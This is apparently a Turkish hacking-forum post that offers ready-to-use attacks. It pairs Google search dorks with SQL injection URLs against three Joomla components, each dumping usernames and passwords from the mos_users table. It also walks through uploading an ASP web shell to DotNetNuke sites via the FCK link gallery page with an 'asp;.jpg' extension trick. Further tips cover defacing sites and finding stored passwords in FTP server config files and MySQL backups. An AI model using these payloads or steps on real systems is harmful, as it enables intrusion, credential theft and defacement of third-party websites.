Güncel Joomla SQL Açıkları

Google Arama kodu : allinurl: “com_jokes”

EXPLOIT :

Kod:
index.php?option=com_jokes&Itemid=S@BUN&func=CatVi ew&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*——————————————————–
Joomla SQL Injection(com_recipes)

AUTHOR : S@BUN

Google Arama Kodu : allinurl: “com_recipes”

EXPLOIT :

Kod:
index.php?option=com_recipes&Itemid=S@BUN&func=det ail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*———————————————————————Joomla SQL Injection(com_estateagent)

Açığı Bulan:S@bun

Google Arama Kodu:allinurl: allinurl: “com_estateagent”
EXPLOIT :

Kod:
index.php?option=com_estateagent&Itemid=S@BUN&func =showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN

Dotnuke Asp FSO upload

Dotnuke Asp FSO (File Sistem Obje) upload

dork: “portals/0/”

sitelerin sonuna aşağdaki bölümü ekliyoruz.
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

File ( A File On Your Site )

işaretliyoruz

adres cubuğuna jsp kodunu yapıştırıp enterliyoruz

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

Gözat ekrana geldi

gözattan aşağıdaki linkte verdiğim zehir.asp veya diğer fso scriptlerden birininin uzantısını

asp;.jpg şeklinde değiştirup upload ediyoruz.
Büyük çoğunluğunda çalışıyor. şu çalışmadı bu çalışmadı diye yazmayın. çalışmıyorsa serverde kurulu antivirüsler scripti yutmuştur, veya sadece kodlar görünür asp çalışmayabilir.
serverde permission yoksa tümünü deface etmek mümkündür. permission varsa permissionları
aşmak oldukça güçtür. C:\program files te ws_ftp ini servu.ini gibi dosyalarda şifreler olabilir
plesk se herhangi bir önlem alınmadıysa mysql backup tan nadirde olsa bir takım veriler alınabilir

uzakdoğu bilhassa çin siteleri için nhd.asp yi kullanın diğerleri çalışmazsa nhd.asp çalışır.